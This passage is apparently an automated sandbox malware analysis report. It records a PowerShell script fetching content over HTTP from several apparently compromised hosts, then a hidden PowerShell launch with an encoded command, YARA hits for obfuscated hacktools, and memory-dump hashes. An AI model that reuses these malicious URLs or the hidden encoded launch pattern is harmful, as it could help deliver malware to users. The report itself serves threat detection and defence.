                                              Content-Type: text/html
                                              Content-Length: 183
                                              Connection: keep-alive
                                              Location: https://www.stmarouns.nsw.edu.au/paypal/b8G/
                                              X-Cache: Redirect from cloudfront
                                              Via: 1.1 9128c49d19c76fd86ec4c647434ccb0a.cloudfront.net (CloudFront)
                                              X-Amz-Cf-Pop: FRA50-C1
                                              X-Amz-Cf-Id: 66Zh7svNLv4LB1S0pqWi3BVNh2F8WIe7yWj5SVxFudpHmZS6j5LYyQ==
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              3 | 192.168.2.3 | 49741 | 159.65.89.222 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 18, 2021 15:54:20.060494900 CEST | 1697 | OUT | GET /content/6F2gd/ HTTP/1.1
                                              Host: wm.mcdevelop.net
                                              Connection: Keep-Alive
                                              May 18, 2021 15:54:20.119771004 CEST | 1698 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Tue, 18 May 2021 13:54:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 153
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                              HTTPS Packets

                                              Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                              May 18, 2021 15:53:59.484607935 CEST | 35.214.199.246 | 443 | 192.168.2.3 | 49733 | CN=mikegeerinck.com | CN=R3, O=Let's Encrypt, C=US | Sat May 08 02:30:43 CEST 2021 | Fri Aug 06 02:30:43 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
                                                  CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025
                                              May 18, 2021 15:54:18.328510046 CEST | 172.67.223.27 | 443 | 192.168.2.3 | 49738 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Sun Apr 25 02:00:00 CEST 2021 | Mon Apr 25 01:59:59 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025
                                              May 18, 2021 15:54:19.203941107 CEST | 143.204.98.64 | 443 | 192.168.2.3 | 49740 | CN=stmarouns.nsw.edu.au | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Fri Feb 12 01:00:00 CET 2021 | Mon Mar 14 00:59:59 CET 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
                                                  CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025
                                                  CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037
                                                  CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034

                                              Code Manipulations

                                              Statistics

                                              CPU Usage


                                              Memory Usage


                                              High Level Behavior Distribution


                                              Behavior


                                              System Behavior

                                              General

                                              Start time:15:53:31
                                              Start date:18/05/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\ps_script.ps1'
                                              Imagebase:0x7ff785e30000
                                              File size:447488 bytes
                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.333177973.00000199B1C5D000.00000004.00000001.sdmp, Author: Florian Roth
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.333520412.00000199C97A3000.00000004.00000001.sdmp, Author: Florian Roth
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.328991391.00000199C97A3000.00000004.00000001.sdmp, Author: Florian Roth
                                              Reputation:high

                                              General

                                              Start time:15:53:31
                                              Start date:18/05/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6b2800000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:15:53:33
                                              Start date:18/05/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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
                                              Imagebase:0x7ff785e30000
                                              File size:447488 bytes
                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              Disassembly

                                              Code Analysis


                                                Executed Functions

                                                Memory Dump Source
• Source File: 00000000.00000002.335238200.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffaeea30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
• Instruction ID: 119bc363d1f8bdf002a9a1faab3150fb5729403b090a2b7161c297bbb8e72b88
• Opcode Fuzzy Hash: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
• Instruction Fuzzy Hash: B301677125CB0C8FD784EF0CE491AA6B7E0FB95324F50056DE58AC3651DA36E881CB46
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Executed Functions

Strings
Memory Dump Source
• Source File: 00000002.00000002.327819592.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeeb00000_powershell.jbxd
Similarity
• API ID:
• String ID: T_L;$gM$gM$gM$gM
• API String ID: 0-3996976133
• Opcode ID: 46dc370316cf5ff7997cdfd6dd3576b14f23f1d63de8962816f01b4a2a6fd442
• Instruction ID: ad87138d10600951533c613c87f70a1283165619e871a81e6c333add3849ca0e
• Opcode Fuzzy Hash: 46dc370316cf5ff7997cdfd6dd3576b14f23f1d63de8962816f01b4a2a6fd442
• Instruction Fuzzy Hash: E4F1F77190DBC64FE396A72998A92B47FA1EF57210B0AC1FED08DCB1D3D958AC058352
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.327819592.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeeb00000_powershell.jbxd
Similarity
• API ID:
• String ID: gM$gM
• API String ID: 0-891327762
• Opcode ID: 4790af30431984823b21c7d28347f615de33560ebab50016dff9921e10b5358e
• Instruction ID: a3ab1246dc65cd66d6b9bf29006a11545f26715fcab6b166e88180e39709019f
• Opcode Fuzzy Hash: 4790af30431984823b21c7d28347f615de33560ebab50016dff9921e10b5358e
• Instruction Fuzzy Hash: A8212772A0CB4A8FE3A5A72DA8A927477D2EF92210749C1FAE04DC7293DD59BC054342
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
Similarity
• API ID:
• String ID: gc_H
• API String ID: 0-2281762278
• Opcode ID: a720546c4a5441ccd819c56f507003ab07a9f6dd60d3af482050543ac465d5d0
• Instruction ID: 91ff158dd2fc2663adb91ddde547551d5bbbae6dea6caae63dc44dabfe8819e5
• Opcode Fuzzy Hash: a720546c4a5441ccd819c56f507003ab07a9f6dd60d3af482050543ac465d5d0
• Instruction Fuzzy Hash: 52F1BF30A1CA498FDB98EF5CC495AA97BE1FF69301F1541AED00DD7296CA74EC81CB81
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.327819592.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeeb00000_powershell.jbxd
Similarity
• API ID:
• String ID: gM
• API String ID: 0-3674513331
• Opcode ID: bbe64f81e2aff38ac90f8b05f464459ea0ea1bc53bf699443a532b14e77dc218
• Instruction ID: 1c98204cf428878a9dd17a3185fe955cd3b99315b8c45ec04921cd847377a6ff
• Opcode Fuzzy Hash: bbe64f81e2aff38ac90f8b05f464459ea0ea1bc53bf699443a532b14e77dc218
• Instruction Fuzzy Hash: ACF0C232F0CF1A0AF6EAE75C55653B8B1C2DF99620B8AC1FBD50DD3283DD08AD150282
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e59e4515b65a14540f4084c4cc7335c1db714f8d30ed6464cb02386bf478cf0b
• Instruction ID: 0a8817ab22d91ec429685909f6382257a158eae67e15ca2c110c26af653bd5c9
• Opcode Fuzzy Hash: e59e4515b65a14540f4084c4cc7335c1db714f8d30ed6464cb02386bf478cf0b
• Instruction Fuzzy Hash: 1702F230A1CA498FDB88EF1CC485AA9BBE1FF69311F15426ED40DC7296CA74E845CB81
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cee340d43fa4ae7a057387c0d2aae10885af098e0b48d29717a848daf9442cfb
• Instruction ID: c005ff0a66af4dff1a673651c242ceefba49f3d6c22353bb9b4ecfa070240de9
• Opcode Fuzzy Hash: cee340d43fa4ae7a057387c0d2aae10885af098e0b48d29717a848daf9442cfb
• Instruction Fuzzy Hash: 21E1B030A1CA4D8FDB94EF5CC485AADBBE1FF69701F1581AAD00DC7296CA74E885C781
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.327819592.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeeb00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d5edaa95ee2aa7f536c3441ed69968d6030fb6d2e2c0ee9f3b10f2460a0d98f
• Instruction ID: d91afa81b46d5ca060480066dddcccd26efdb792450b8f362adf79e3ad9d5951
• Opcode Fuzzy Hash: 5d5edaa95ee2aa7f536c3441ed69968d6030fb6d2e2c0ee9f3b10f2460a0d98f
• Instruction Fuzzy Hash: 5C31FC72B0CA568FE798AF1CE8526B577D1EB95760B14807FE04DC3293DD25AC0683C2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2159113e4841d2009e4974ad3551eb3772fd05b500ed3a54ebe8f04f51121ab0
• Instruction ID: 7b6df8d6a783fc2964eaa96da4ef2dcbef3db2e000861f2ef6273d1159e64a5b
• Opcode Fuzzy Hash: 2159113e4841d2009e4974ad3551eb3772fd05b500ed3a54ebe8f04f51121ab0
• Instruction Fuzzy Hash: 4321D63026CB494FD749EF18D0917B9B7E1FF96315F10097DE08EC7292DA66A882C702
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e17e03ca96d8e99a92bda75954ec0075ac3a74de84e8ace44f43c85c9c143099
• Instruction ID: 14689d01f7d56a978dc4b0206e2a6a729304d87f352b9e86d6f9f5200c84150c
• Opcode Fuzzy Hash: e17e03ca96d8e99a92bda75954ec0075ac3a74de84e8ace44f43c85c9c143099
• Instruction Fuzzy Hash: 84119C3271C9190FDB94EB1D9481E71BBD1EBA931031540FDD00DCB286D825EC46C3C1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 662492b7c9470f068f2c3c2eeac03e0802dc1a11cce99fbdfd7667e6838e4dcf
• Instruction ID: c658ea347ca6d0fa295398b76377d9a2cf7a90f2b499ca61351b4ced0ad1e5d2
• Opcode Fuzzy Hash: 662492b7c9470f068f2c3c2eeac03e0802dc1a11cce99fbdfd7667e6838e4dcf
• Instruction Fuzzy Hash: F601677125CB084FD754EF0CE491A79B7E1FB95324F10066DE58EC3291DA36E892CB46
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bac637187a45f7fce0cc4c285885ecf49098758f6e798dd6e394a078bdfc7431
• Instruction ID: 99d5105069c8a54fcfc004d58e4ff2e3a6071249db7d9dd3299d37cb4b653523
• Opcode Fuzzy Hash: bac637187a45f7fce0cc4c285885ecf49098758f6e798dd6e394a078bdfc7431
• Instruction Fuzzy Hash: 4BF0303276C6044E975CAA0CF8435B573D1E799221B40017EE48AC2696E916B8428686
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e9bba1ed93614974b5f1ef6c193719099bf49257b0cb2c13617b2d0978e16c9d
• Instruction ID: 07f2dbb9eab6344a44255c0a33571fb12a03f408d66d93d567244fac3927b6c9
• Opcode Fuzzy Hash: e9bba1ed93614974b5f1ef6c193719099bf49257b0cb2c13617b2d0978e16c9d
• Instruction Fuzzy Hash: 2CF0653276C6044FD74CAA0CF8439B573D5E789325B40017EE48FC3287E916FC428685
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions